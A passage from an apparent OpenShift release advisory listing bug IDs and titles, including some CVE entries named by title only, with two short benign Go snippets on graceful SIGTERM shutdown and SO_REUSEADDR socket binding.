The containerruntimecontroller doesn\u0027t roll back to CR-1 if we delete CR-2\n1834551 - ClusterOperatorDown fires when operator is only degraded; states will block upgrades\n1835264 - Intree provisioner doesn\u0027t respect PVC.spec.dataSource sometimes\n1839101 - Some sidebar links in developer perspective don\u0027t follow same project\n1840881 - The KubeletConfigController cannot process multiple confs for a pool/ pool changes\n1846875 - Network setup test high failure rate\n1848151 - Console continues to poll the ClusterVersion resource when the user doesn\u0027t have authority\n1850060 - After upgrading to 3.11.219 timeouts are appearing. 
\n1852637 - Kubelet sets incorrect image names in node status images section\n1852743 - Node list CPU column only show usage\n1853467 - container_fs_writes_total is inconsistent with CPU/memory in summarizing cgroup values\n1857008 - [Edge] [BareMetal] Not provided STATE value for machines\n1857477 - Bad helptext for storagecluster creation\n1859382 - check-endpoints panics on graceful shutdown\n1862084 - Inconsistency of time formats in the OpenShift web-console\n1864116 - Cloud credential operator scrolls warnings about unsupported platform\n1866222 - Should output all options when runing `operator-sdk init --help`\n1866318 - [RHOCS Usability Study][Dashboard] Users found it difficult to navigate to the OCS dashboard\n1866322 - [RHOCS Usability Study][Dashboard] Alert details page does not help to explain the Alert\n1866331 - [RHOCS Usability Study][Dashboard] Users need additional tooltips or definitions\n1868755 - [vsphere] terraform provider vsphereprivate crashes when network is unavailable on host\n1868870 - CVE-2020-15113 etcd: directories created via os.MkdirAll are not checked for permissions\n1868872 - CVE-2020-15112 etcd: DoS in wal/wal.go\n1868874 - CVE-2020-15114 etcd: gateway can include itself as an endpoint resulting in resource exhaustion and leads to DoS\n1868880 - CVE-2020-15136 etcd: no authentication is performed against endpoints provided in the --endpoints flag\n1868883 - CVE-2020-15106 etcd: Large slice causes panic in decodeRecord method\n1871303 - [sig-instrumentation] Prometheus when installed on the cluster should have important platform topology metrics\n1871770 - [IPI baremetal] The Keepalived.conf file is not indented evenly\n1872659 - ClusterAutoscaler doesn\u0027t scale down when a node is not needed anymore\n1873079 - SSH to api and console route is possible when the clsuter is hosted on Openstack\n1873649 - proxy.config.openshift.io should validate user inputs\n1874322 - openshift/oauth-proxy: htpasswd using SHA1 to store credentials\n1874931 - Accessibility - Keyboard shortcut to exit YAML editor not easily discoverable\n1876918 - scheduler test leaves taint behind\n1878199 - Remove Log Level Normalization controller in cluster-config-operator release N+1\n1878655 - [aws-custom-region] creating manifests take too much time when custom endpoint is unreachable\n1878685 - Ingress resource with \"Passthrough\"  annotation does not get applied when using the newer \"networking.k8s.io/v1\" API\n1879077 - Nodes tainted after configuring additional host iface\n1879140 - console auth errors not understandable by customers\n1879182 - switch over to secure access-token logging by default and delete old non-sha256 tokens\n1879184 - CVO must detect or log resource hotloops\n1879495 - [4.6] namespace \\\u201copenshift-user-workload-monitoring\\\u201d does not exist\u201d\n1879638 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string\n1879944 - [OCP 4.8] Slow PV creation with vsphere\n1880757 - AWS: master not removed from LB/target group when machine deleted\n1880758 - Component descriptions in cloud console have bad description (Managed by Terraform)\n1881210 - nodePort for router-default metrics with NodePortService does not exist\n1881481 - CVO hotloops on some service manifests\n1881484 - CVO hotloops on deployment manifests\n1881514 - CVO hotloops on imagestreams from cluster-samples-operator\n1881520 - CVO hotloops on (some) clusterrolebindings\n1881522 - CVO hotloops on clusterserviceversions packageserver\n1881662 
- Error getting volume limit for plugin kubernetes.io/\u003cname\u003e in kubelet logs\n1881694 - Evidence of disconnected installs pulling images from the local registry instead of quay.io\n1881938 - migrator deployment doesn\u0027t tolerate masters\n1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability\n1883587 - No option for user to select volumeMode\n1883993 - Openshift 4.5.8 Deleting pv disk vmdk after delete machine\n1884053 - cluster DNS experiencing disruptions during cluster upgrade in insights cluster\n1884800 - Failed to set up mount unit: Invalid argument\n1885186 - Removing ssh keys MC does not remove the key from authorized_keys\n1885349 - [IPI Baremetal] Proxy Information Not passed to metal3\n1885717 - activeDeadlineSeconds DeadlineExceeded does not show terminated container statuses\n1886572 - auth: error contacting auth provider when extra ingress (not default)  goes down\n1887849 - When creating new storage class failure_domain is missing. \n1888712 - Worker nodes do not come up on a baremetal IPI deployment with control plane network configured on a vlan on top of bond interface due to Pending CSRs\n1889689 - AggregatedAPIErrors alert may never fire\n1890678 - Cypress:  Fix \u0027structure\u0027 accesibility violations\n1890828 - Intermittent prune job failures causing operator degradation\n1891124 - CP Conformance: CRD spec and status failures\n1891301 - Deleting bmh  by \"oc delete bmh\u0027 get stuck\n1891696 - [LSO] Add capacity UI does not check for node present in selected storageclass\n1891766 - [LSO] Min-Max filter\u0027s from OCS wizard accepts Negative values and that cause PV not getting created\n1892642 - oauth-server password metrics do not appear in UI after initial OCP installation\n1892718 - HostAlreadyClaimed: The new route cannot be loaded with a new api group version\n1893850 - Add an alert for requests rejected by the apiserver\n1893999 - can\u0027t login ocp cluster with oc 4.7 client without the username\n1895028 - [gcp-pd-csi-driver-operator] Volumes created by CSI driver are not deleted on cluster deletion\n1895053 - Allow builds to optionally mount in cluster trust stores\n1896226 - recycler-pod template should not be in kubelet static manifests directory\n1896321 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types\n1896751 - [RHV IPI] Worker nodes stuck in the Provisioning Stage if the machineset has a long name\n1897415 - [Bare Metal - Ironic] provide the ability to set the cipher suite for ipmitool when doing a Bare Metal IPI install\n1897621 - Auth test.Login test.logs in as kubeadmin user: Timeout\n1897918 - [oVirt] e2e tests fail due to kube-apiserver not finishing\n1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability\n1899057 - fix spurious br-ex MAC address error log\n1899187 - [Openstack] node-valid-hostname.service failes during the first boot leading to 5 minute provisioning delay\n1899587 - [External] RGW usage metrics shown on Object Service Dashboard  is incorrect\n1900454 - Enable host-based disk encryption on Azure platform\n1900819 - Scaled ingress replicas following sharded pattern don\u0027t balance evenly across multi-AZ\n1901207 - Search Page - Pipeline resources table not immediately updated after Name filter applied or removed\n1901535 - Remove the managingOAuthAPIServer field from the authentication.operator API\n1901648 - \"do you need to set up custom dns\" tooltip inaccurate\n1902003 - Jobs Completions column is not sorting 
when there are \"0 of 1\" and \"1 of 1\" in the list. \n1902076 - image registry operator should monitor status of its routes\n1902247 - openshift-oauth-apiserver apiserver pod crashloopbackoffs\n1903055 - [OSP] Validation should fail when no any IaaS flavor or type related field are given\n1903228 - Pod stuck in Terminating, runc init process frozen\n1903383 - Latest RHCOS 47.83. builds failing to install: mount /root.squashfs failed\n1903553 - systemd container renders node NotReady after deleting it\n1903700 - metal3 Deployment doesn\u0027t have unique Pod selector\n1904006 - The --dir option doest not work for command  `oc image extract`\n1904505 - Excessive Memory Use in Builds\n1904507 - vsphere-problem-detector: implement missing metrics\n1904558 - Random init-p error when trying to start pod\n1905095 - Images built on OCP 4.6 clusters create manifests that result in quay.io (and other registries) rejecting those manifests\n1905147 - ConsoleQuickStart Card\u0027s prerequisites is a combined text instead of a list\n1905159 - Installation on previous unused dasd fails after formatting\n1905331 - openshift-multus initContainer multus-binary-copy, etc. are not requesting required resources: cpu, memory\n1905460 - Deploy using virtualmedia for disabled provisioning network on real BM(HPE) fails\n1905577 - Control plane machines not adopted when provisioning network is disabled\n1905627 - Warn users when using an unsupported browser such as IE\n1905709 - Machine API deletion does not properly handle stopped instances on AWS or GCP\n1905849 - Default volumesnapshotclass should be created when creating default storageclass\n1906056 - Bundles skipped via the `skips` field cannot be pinned\n1906102 - CBO produces standard metrics\n1906147 - ironic-rhcos-downloader should not use --insecure\n1906304 - Unexpected value NaN parsing x/y attribute when viewing pod Memory/CPU usage chart\n1906740 - [aws]Machine should be \"Failed\" when creating a machine with invalid region\n1907309 - Migrate controlflow v1alpha1 to v1beta1 in storage\n1907315 - the internal load balancer annotation for AWS should use \"true\" instead of \"0.0.0.0/0\" as value\n1907353 - [4.8] OVS daemonset is wasting resources even though it doesn\u0027t do anything\n1907614 - Update kubernetes deps to 1.20\n1908068 - Enable DownwardAPIHugePages feature gate\n1908169 - The example of Import URL is \"Fedora cloud image list\" for all templates. 
\n1908170 - sriov network resource injector: Hugepage injection doesn\u0027t work with mult container\n1908343 - Input labels in Manage columns modal should be clickable\n1908378 - [sig-network] pods should successfully create sandboxes by getting pod - Static Pod Failures\n1908655 - \"Evaluating rule failed\" for \"record: node:node_num_cpu:sum\" rule\n1908762 - [Dualstack baremetal cluster] multicast traffic is not working on ovn-kubernetes\n1908765 - [SCALE] enable OVN lflow data path groups\n1908774 - [SCALE] enable OVN DB memory trimming on compaction\n1908916 - CNO: turn on OVN DB RAFT diffs once all master DB pods are capable of it\n1909091 - Pod/node/ip/template isn\u0027t showing when vm is running\n1909600 - Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error\n1909849 - release-openshift-origin-installer-e2e-aws-upgrade-fips-4.4 is perm failing\n1909875 - [sig-cluster-lifecycle] Cluster version operator acknowledges upgrade : timed out waiting for cluster to acknowledge upgrade\n1910067 - UPI: openstacksdk fails on \"server group list\"\n1910113 - periodic-ci-openshift-release-master-ocp-4.5-ci-e2e-44-stable-to-45-ci is never passing\n1910318 - OC 4.6.9 Installer failed: Some pods are not scheduled: 3 node(s) didn\u0027t match node selector: AWS compute machines without status\n1910378 - socket timeouts for webservice communication between pods\n1910396 - 4.6.9 cred operator should back-off when provisioning fails on throttling\n1910500 - Could not list CSI provisioner on web when create storage class on GCP platform\n1911211 - Should show the cert-recovery-controller version  correctly\n1911470 - ServiceAccount Registry Authfiles Do Not Contain Entries for Public Hostnames\n1912571 - libvirt: Support setting dnsmasq options through the install config\n1912820 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade\n1913112 - BMC details should be optional for unmanaged hosts\n1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag\n1913341 - GCP: strange cluster behavior in CI run\n1913399 - switch to v1beta1 for the priority and fairness APIs\n1913525 - Panic in OLM packageserver when invoking webhook authorization endpoint\n1913532 - After a 4.6 to 4.7 upgrade, a node went unready\n1913974 - snapshot test periodically failing with \"can\u0027t open \u0027/mnt/test/data\u0027: No such file or directory\"\n1914127 - Deletion of oc get svc router-default -n openshift-ingress hangs\n1914446 - openshift-service-ca-operator and openshift-service-ca pods run as root\n1914994 - Panic observed in k8s-prometheus-adapter since k8s 1.20\n1915122 - Size of the hostname was preventing proper DNS resolution of the worker node names\n1915693 - Not able to install gpu-operator on cpumanager enabled node. \n1915971 - Role and Role Binding breadcrumbs do not work as expected\n1916116 - the left navigation menu would not be expanded if repeat clicking the links in Overview page\n1916118 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall\n1916392 - scrape priority and fairness endpoints for must-gather\n1916450 - Alertmanager: add title and text fields to Adv. config. 
section of Slack Receiver form\n1916489 - [sig-scheduling] SchedulerPriorities [Serial] fails with \"Error waiting for 1 pods to be running - probably a timeout: Timeout while waiting for pods with labels to be ready\"\n1916553 - Default template\u0027s description is empty on details tab\n1916593 - Destroy cluster sometimes stuck in a loop\n1916872 - need ability to reconcile exgw annotations on pod add\n1916890 - [OCP 4.7] api or api-int not available during installation\n1917241 - [en_US] The tooltips of Created date time is not easy to read in all most of UIs. \n1917282 - [Migration] MCO stucked for rhel worker after  enable the migration prepare state\n1917328 - It should default to current namespace when create vm from template action on details page\n1917482 - periodic-ci-openshift-release-master-ocp-4.7-e2e-metal-ipi failing with \"cannot go from state \u0027deploy failed\u0027 to state \u0027manageable\u0027\"\n1917485 - [oVirt] ovirt machine/machineset object has missing some field validations\n1917667 - Master machine config pool updates are stalled during the migration from SDN to OVNKube. \n1917906 - [oauth-server] bump k8s.io/apiserver to 1.20.3\n1917931 - [e2e-gcp-upi] failing due to missing pyopenssl library\n1918101 - [vsphere]Delete Provisioning machine took about 12 minutes\n1918376 - Image registry pullthrough does not support ICSP, mirroring e2es do not pass\n1918442 - Service Reject ACL does not work on dualstack\n1918723 - installer fails to write boot record on 4k scsi lun on s390x\n1918729 - Add hide/reveal button for the token field in the KMS configuration page\n1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve\n1918785 - Pod request and limit calculations in console are incorrect\n1918910 - Scale from zero annotations should not requeue if instance type missing\n1919032 - oc image extract - will not extract files from image rootdir - \"error: unexpected directory from mapping tests.test\"\n1919048 - Whereabouts IPv6 addresses not calculated when leading hextets equal 0\n1919151 - [Azure] dnsrecords with invalid domain should not be published to Azure dnsZone\n1919168 - `oc adm catalog mirror` doesn\u0027t work for the air-gapped cluster\n1919291 - [Cinder-csi-driver] Filesystem did not expand for on-line volume resize\n1919336 - vsphere-problem-detector should check if datastore is part of datastore cluster\n1919356 - Add missing profile annotation in cluster-update-keys manifests\n1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration\n1919398 - Permissive Egress NetworkPolicy (0.0.0.0/0) is blocking all traffic\n1919406 - OperatorHub filter heading \"Provider Type\" should be \"Source\"\n1919737 - hostname lookup delays when master node down\n1920209 - Multus daemonset upgrade takes the longest time in the cluster during an upgrade\n1920221 - GCP jobs exhaust zone listing query quota sometimes due to too many initializations of cloud provider in tests\n1920300 - cri-o does not support configuration of stream idle time\n1920307 - \"VM not running\" should be \"Guest agent required\" on vm details page in dev console\n1920532 - Problem in trying to connect through the service to a member that is the same as the caller. 
1920677 - Various missingKey errors in the devconsole namespace
1920699 - Operation cannot be fulfilled on clusterresourcequotas.quota.openshift.io error when creating different OpenShift resources
1920901 - [4.7]"500 Internal Error" for prometheus route in https_proxy cluster
1920903 - oc adm top reporting unknown status for Windows node
1920905 - Remove DNS lookup workaround from cluster-api-provider
1921106 - A11y Violation: button name(s) on Utilization Card on Cluster Dashboard
1921184 - kuryr-cni binds to wrong interface on machine with two interfaces
1921227 - Fix issues related to consuming new extensions in Console static plugins
1921264 - Bundle unpack jobs can hang indefinitely
1921267 - ResourceListDropdown not internationalized
1921321 - SR-IOV obliviously reboot the node
1921335 - ThanosSidecarUnhealthy
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1921720 - test: openshift-tests.[sig-cli] oc observe works as expected [Suite:openshift/conformance/parallel]
1921763 - operator registry has high memory usage in 4.7... cleanup row closes
1921778 - Push to stage now failing with semver issues on old releases
1921780 - Search page not fully internationalized
1921781 - DefaultList component not internationalized
1921878 - [kuryr] Egress network policy with namespaceSelector in Kuryr behaves differently than in OVN-Kubernetes
1921885 - Server-side Dry-run with Validation Downloads Entire OpenAPI spec often
1921892 - MAO: controller runtime manager closes event recorder
1921894 - Backport Avoid node disruption when kube-apiserver-to-kubelet-signer is rotated
1921937 - During upgrade /etc/hostname becomes a directory, nodes are set with kubernetes.io/hostname=localhost label
1921953 - ClusterServiceVersion property inference does not infer package and version
1922063 - "Virtual Machine" should be "Templates" in template wizard
1922065 - Rootdisk size is default to 15GiB in customize wizard
1922235 - [build-watch] e2e-aws-upi - e2e-aws-upi container setup failing because of Python code version mismatch
1922264 - Restore snapshot as a new PVC: RWO/RWX access modes are not click-able if parent PVC is deleted
1922280 - [v2v] on the upstream release, In VM import wizard I see RHV but no oVirt
1922646 - Panic in authentication-operator invoking webhook authorization
1922648 - FailedCreatePodSandBox due to "failed to pin namespaces [uts]: [pinns:e]: /var/run/utsns exists and is not a directory: File exists"
1922764 - authentication operator is degraded due to number of kube-apiservers
1922992 - some button text on YAML sidebar are not translated
1922997 - [Migration]The SDN migration rollback failed.
1923038 - [OSP] Cloud Info is loaded twice
1923157 - Ingress traffic performance drop due to NodePort services
1923786 - RHV UPI fails with unhelpful message when ASSET_DIR is not set.
1923811 - Registry claims Available=True despite .status.readyReplicas == 0 while .spec.replicas == 2
1923847 - Error occurs when creating pods if configuring multiple key-only labels in default cluster-wide node selectors or project-wide node selectors
1923984 - Incorrect anti-affinity for UWM prometheus
1924020 - panic: runtime error: index out of range [0] with length 0
1924075 - kuryr-controller restart when enablePortPoolsPrepopulation = true
1924083 - "Activity" Pane of Persistent Storage tab shows events related to Noobaa too
1924140 - [OSP] Typo in OPENSHFIT_INSTALL_SKIP_PREFLIGHT_VALIDATIONS variable
1924171 - ovn-kube must handle single-stack to dual-stack migration
1924358 - metal UPI setup fails, no worker nodes
1924502 - Failed to start transient scope unit: Argument list too long / systemd[1]: Failed to set up mount unit: Invalid argument
1924536 - 'More about Insights' link points to support link
1924585 - "Edit Annotation" are not correctly translated in Chinese
1924586 - Control Plane status and Operators status are not fully internationalized
1924641 - [User Experience] The message "Missing storage class" needs to be displayed after user clicks Next and needs to be rephrased
1924663 - Insights operator should collect related pod logs when operator is degraded
1924701 - Cluster destroy fails when using byo with Kuryr
1924728 - Difficult to identify deployment issue if the destination disk is too small
1924729 - Create Storageclass for CephFS provisioner assumes incorrect default FSName in external mode (side-effect of fix for Bug 1878086)
1924747 - InventoryItem doesn't internationalize resource kind
1924788 - Not clear error message when there are no NADs available for the user
1924816 - Misleading error messages in ironic-conductor log
1924869 - selinux avc deny after installing OCP 4.7
1924916 - PVC reported as Uploading when it is actually cloning
1924917 - kuryr-controller in crash loop if IP is removed from secondary interfaces
1924953 - newly added 'excessive etcd leader changes' test case failing in serial job
1924968 - Monitoring list page filter options are not translated
1924983 - some components in utils directory not localized
1925017 - [UI] VM Details-> Network Interfaces, 'Name,' is displayed instead on 'Name'
1925061 - Prometheus backed by a PVC may start consuming a lot of RAM after 4.6 -> 4.7 upgrade due to series churn
1925083 - Some texts are not marked for translation on idp creation page.
1925087 - Add i18n support for the Secret page
1925148 - Shouldn't create the redundant imagestream when use `oc new-app --name=testapp2 -i ` with exist imagestream
1925207 - VM from custom template - cloudinit disk is not added if creating the VM from custom template using customization wizard
1925216 - openshift installer fails immediately failed to fetch Install Config
1925236 - OpenShift Route targets every port of a multi-port service
1925245 - oc idle: Clusters upgrading with an idled workload do not have annotations on the workload's service
1925261 - Items marked as mandatory in KMS Provider form are not enforced
1925291 - Baremetal IPI - While deploying with IPv6 provision network with subnet other than /64 masters fail to PXE boot
1925343 - [ci] e2e-metal tests are not using reserved instances
1925493 - Enable snapshot e2e tests
1925586 - cluster-etcd-operator is leaking transports
1925614 - Error: InstallPlan.operators.coreos.com not found
1925698 - On GCP, load balancers report kube-apiserver fails its /readyz check 50% of the time, causing load balancer backend churn and disruptions to apiservers
1926029 - [RFE] Either disable save or give warning when no disks support snapshot
1926054 - Localvolume CR is created successfully, when the storageclass name defined in the localvolume exists.
1926072 - Close button (X) does not work in the new "Storage cluster exists" Warning alert message(introduced via fix for Bug 1867400)
1926082 - Insights operator should not go degraded during upgrade
1926106 - [ja_JP][zh_CN] Create Project, Delete Project and Delete PVC modal are not fully internationalized
1926115 - Texts in "Insights" popover on overview page are not marked for i18n
1926123 - Pseudo bug: revert "force cert rotation every couple days for development" in 4.7
1926126 - some kebab/action menu translation issues
1926131 - Add HPA page is not fully internationalized
1926146 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it
1926154 - Create new pool with arbiter - wrong replica
1926278 - [oVirt] consume K8S 1.20 packages
1926279 - Pod ignores mtu setting from sriovNetworkNodePolicies in case of PF partitioning
1926285 - ignore pod not found status messages
1926289 - Accessibility: Modal content hidden from screen readers
1926310 - CannotRetrieveUpdates alerts on Critical severity
1926329 - [Assisted-4.7][Staging] monitoring stack in staging is being overloaded by the amount of metrics being exposed by assisted-installer pods and scraped by prometheus.
1926336 - Service details can overflow boxes at some screen widths
1926346 - move to go 1.15 and registry.ci.openshift.org
1926364 - Installer timeouts because proxy blocked connection to Ironic API running on bootstrap VM
1926465 - bootstrap kube-apiserver does not have --advertise-address set – was: [BM][IPI][DualStack] Installation fails cause Kubernetes service doesn't have IPv6 endpoints
1926484 - API server exits non-zero on 2 SIGTERM signals
1926547 - OpenShift installer not reporting IAM permission issue when removing the Shared Subnet Tag
1926579 - Setting .spec.policy is deprecated and will be removed eventually. Please use .spec.profile instead is being logged every 3 seconds in scheduler operator log
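
Bug 1926484 above concerns the API server exiting non-zero after receiving two SIGTERM signals. As background, here is a minimal Go sketch of the common convention (first SIGTERM starts a graceful drain, a second one forces a non-zero exit); it is illustrative only and is not the kube-apiserver's actual shutdown code:

package main

import (
	"context"
	"fmt"
	"os"
	"os/signal"
	"syscall"
	"time"
)

func main() {
	sigs := make(chan os.Signal, 2)
	signal.Notify(sigs, syscall.SIGTERM)

	<-sigs // first SIGTERM: begin a bounded graceful drain
	fmt.Println("SIGTERM received, draining...")
	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
	defer cancel()

	go func() {
		<-sigs // second SIGTERM: stop waiting and exit non-zero
		fmt.Println("second SIGTERM, forcing shutdown")
		os.Exit(1)
	}()

	drain(ctx)
	fmt.Println("drained cleanly")
}

// drain stands in for finishing in-flight requests; a placeholder here.
func drain(ctx context.Context) {
	select {
	case <-ctx.Done():
	case <-time.After(2 * time.Second):
	}
}
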
1926598 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results
1926776 - "Template support" modal appears when select the RHEL6 common template
1926835 - [e2e][automation] prow gating use unsupported CDI version
1926843 - pipeline with finally tasks status is improper
1926867 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade
1926893 - When deploying the operator via OLM (after creating the respective catalogsource), the deployment "lost" the `resources` section.
1926903 - NTO may fail to disable stalld when relying on Tuned '[service]' plugin
1926931 - Inconsistent ovs-flow rule on one of the app node for egress node
1926943 - vsphere-problem-detector: Alerts in CI jobs
1926977 - [sig-devex][Feature:ImageEcosystem][Slow] openshift sample application repositories rails/nodejs
1927013 - Tables don't render properly at smaller screen widths
1927017 - CCO does not relinquish leadership when restarting for proxy CA change
1927042 - Empty static pod files on UPI deployments are confusing
1927047 - multiple external gateway pods will not work in ingress with IP fragmentation
1927068 - Workers fail to PXE boot when IPv6 provisionining network has subnet other than /64
1927075 - [e2e][automation] Fix pvc string in pvc.view
1927118 - OCP 4.7: NVIDIA GPU Operator DCGM metrics not displayed in OpenShift Console Monitoring Metrics page
1927244 - UPI installation with Kuryr timing out on bootstrap stage
1927263 - kubelet service takes around 43 secs to start container when started from stopped state
1927264 - FailedCreatePodSandBox due to multus inability to reach apiserver
1927310 - Performance: Console makes unnecessary requests for en-US messages on load
1927340 - Race condition in OperatorCondition reconcilation
1927366 - OVS configuration service unable to clone NetworkManager's connections in the overlay FS
1927391 - Fix flake in TestSyncPodsDeletesWhenSourcesAreReady
1927393 - 4.7 still points to 4.6 catalog images
1927397 - p&f: add auto update for priority & fairness bootstrap configuration objects
1927423 - Happy "Not Found" and no visible error messages on error-list page when /silences 504s
1927465 - Homepage dashboard content not internationalized
1927678 - Reboot interface defaults to softPowerOff so fencing is too slow
1927731 - /usr/lib/dracut/modules.d/30ignition/ignition --version sigsev
1927797 - 'Pod(s)' should be included in the pod donut label when a horizontal pod autoscaler is enabled
1927882 - Can't create cluster role binding from UI when a project is selected
1927895 - global RuntimeConfig is overwritten with merge result
1927898 - i18n Admin Notifier
1927902 - i18n Cluster Utilization dashboard duration
1927903 - "CannotRetrieveUpdates" - critical error in openshift web console
1927925 - Manually misspelled as Manualy
1927941 - StatusDescriptor detail item and Status component can cause runtime error when the status is an object or array
1927942 - etcd should use socket option (SO_REUSEADDR) instead of wait for port release on process restart
1927944 - cluster version operator cycles terminating state waiting for leader election
1927993 - Documentation Links in OKD Web Console are not Working
1928008 - Incorrect behavior when we click back button after viewing the node details in Internal-attached mode
1928045 - N+1 scaling Info message says "single zone" even if the nodes are spread across 2 or 0 zones
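
Bug 1927942 asks etcd to set SO_REUSEADDR rather than wait for the old port to be released. A minimal Go sketch of binding a listener with that option, assuming golang.org/x/sys/unix is available; this is not etcd's actual listener code:

package main

import (
	"context"
	"net"
	"syscall"

	"golang.org/x/sys/unix"
)

// listenReuseAddr binds addr with SO_REUSEADDR set, so a restarted
// process can rebind immediately instead of waiting for lingering
// TIME_WAIT sockets to drain.
func listenReuseAddr(addr string) (net.Listener, error) {
	lc := net.ListenConfig{
		Control: func(network, address string, c syscall.RawConn) error {
			var sockErr error
			if err := c.Control(func(fd uintptr) {
				sockErr = unix.SetsockoptInt(int(fd), unix.SOL_SOCKET, unix.SO_REUSEADDR, 1)
			}); err != nil {
				return err
			}
			return sockErr
		},
	}
	return lc.Listen(context.Background(), "tcp", addr)
}

func main() {
	ln, err := listenReuseAddr("127.0.0.1:2379") // port chosen for illustration
	if err != nil {
		panic(err)
	}
	ln.Close()
}
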
1928147 - Domain search set in the required domains in Option 119 of DHCP Server is ignored by RHCOS on RHV
1928157 - 4.7 CNO claims to be done upgrading before it even starts
1928164 - Traffic to outside the cluster redirected when OVN is used and NodePort service is configured
1928297 - HAProxy fails with 500 on some requests
1928473 - NetworkManager overlay FS not being created on None platform
1928512 - sap license management logs gatherer
1928537 - Cannot IPI with tang/tpm disk encryption
1928640 - Definite error message when using StorageClass based on azure-file / Premium_LRS
1928658 - Update plugins and Jenkins version to prepare openshift-sync-plugin 1.0.46 release
1928850 - Unable to pull images due to limited quota on Docker Hub
1928851 - manually creating NetNamespaces will break things and this is not obvious
1928867 - golden images - DV should not be created with WaitForFirstConsumer
1928869 - Remove css required to fix search bug in console caused by pf issue in 2021.1
1928875 - Update translations
1928893 - Memory Pressure Drop Down Info is stating "Disk" capacity is low instead of memory
1928931 - DNSRecord CRD is using deprecated v1beta1 API
1928937 - CVE-2021-23337 nodejs-lodash: command injection via template
1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions
1929052 - Add new Jenkins agent maven dir for 3.6
1929056 - kube-apiserver-availability.rules are failing evaluation
1929110 - LoadBalancer service check test fails during vsphere upgrade
1929136 - openshift isn't able to mount nfs manila shares to pods
1929175 - LocalVolumeSet: PV is created on disk belonging to other provisioner
1929243 - Namespace column missing in Nodes Node Details / pods tab
1929277 - Monitoring workloads using too high a priorityclass
1929281 - Update Tech Preview badge to transparent border color when upgrading to PatternFly v4.87.1
1929314 - ovn-kubernetes endpoint slice controller doesn't run on CI jobs
1929359 - etcd-quorum-guard uses origin-cli [4.8]
1929577 - Edit Application action overwrites Deployment envFrom values on save
1929654 - Registry for Azure uses legacy V1 StorageAccount
1929693 - Pod stuck at "ContainerCreating" status
1929733 - oVirt CSI driver operator is constantly restarting
1929769 - Getting 404 after switching user perspective in another tab and reload Project details
1929803 - Pipelines shown in edit flow for Workloads created via ContainerImage flow
1929824 - fix alerting on volume name check for vsphere
1929917 - Bare-metal operator is firing for ClusterOperatorDown for 15m during 4.6 to 4.7 upgrade
1929944 - The etcdInsufficientMembers alert fires incorrectly when any instance is down and not when quorum is lost
1930007 - filter dropdown item filter and resource list dropdown item filter doesn't support multi selection
1930015 - OS list is overlapped by buttons in template wizard
1930064 - Web console crashes during VM creation from template when no storage classes are defined
1930220 - Cinder CSI driver is not able to mount volumes under heavier load
1930240 - Generated clouds.yaml incomplete when provisioning network is disabled
1930248 - After creating a remediation flow and rebooting a worker there is no access to the openshift-web-console
1930268 - intel vfio devices are not expose as resources
1930356 - Darwin binary missing from mirror.openshift.com
1930393 - Gather info about unhealthy SAP pods
1930546 - Monitoring-dashboard-workload keep loading when user with cluster-role cluster-monitoring-view login develoer console
1930570 - Jenkins templates are displayed in Developer Catalog twice
1930620 - the logLevel field in containerruntimeconfig can't be set to "trace"
1930631 - Image local-storage-mustgather in the doc does not come from product registry
1930893 - Backport upstream patch 98956 for pod terminations
1931005 - Related objects page doesn't show the object when its name is empty
1931103 - remove periodic log within kubelet
1931115 - Azure cluster install fails with worker type workers Standard_D4_v2
1931215 - [RFE] Cluster-api-provider-ovirt should handle affinity groups
1931217 - [RFE] Installer should create RHV Affinity group for OCP cluster VMS
1931467 - Kubelet consuming a large amount of CPU and memory and node becoming unhealthy
1931505 - [IPI baremetal] Two nodes hold the VIP post remove and start of the Keepalived container
1931522 - Fresh UPI install on BM with bonding using OVN Kubernetes fails
1931529 - SNO: mentioning of 4 nodes in error message - Cluster network CIDR prefix 24 does not contain enough addresses for 4 hosts each one with 25 prefix (128 addresses)
1931629 - Conversational Hub Fails due to ImagePullBackOff
1931637 - Kubeturbo Operator fails due to ImagePullBackOff
1931652 - [single-node] etcd: discover-etcd-initial-cluster graceful termination race.
1931658 - [single-node] cluster-etcd-operator: cluster never pivots from bootstrapIP endpoint
1931674 - [Kuryr] Enforce nodes MTU for the Namespaces and Pods
1931852 - Ignition HTTP GET is failing, because DHCP IPv4 config is failing silently
1931883 - Fail to install Volume Expander Operator due to CrashLookBackOff
1931949 - Red Hat Integration Camel-K Operator keeps stuck in Pending state
1931974 - Operators cannot access kubeapi endpoint on OVNKubernetes on ipv6
1931997 - network-check-target causes upgrade to fail from 4.6.18 to 4.7
1932001 - Only one of multiple subscriptions to the same package is honored
1932097 - Apiserver liveness probe is marking it as unhealthy during normal shutdown
1932105 - machine-config ClusterOperator claims level while control-plane still updating
1932133 - AWS EBS CSI Driver doesn't support "csi.storage.k8s.io/fsTyps" parameter
1932135 - When "iopsPerGB" parameter is not set, event for AWS EBS CSI Driver provisioning is not clear
1932152 - When "iopsPerGB" parameter is set to a wrong number, events for AWS EBS CSI Driver provisioning are not clear
1932154 - [AWS ] machine stuck in provisioned phase , no warnings or errors
1932182 - catalog operator causing CPU spikes and bad etcd performance
1932229 - Can't find kubelet metrics for aws ebs csi volumes
1932281 - [Assisted-4.7][UI] Unable to change upgrade channel once upgrades were discovered
1932323 - CVE-2021-26540 sanitize-html: improper validation of hostnames set by the "allowedIframeHostnames" option can lead to bypass hostname whitelist for iframe element
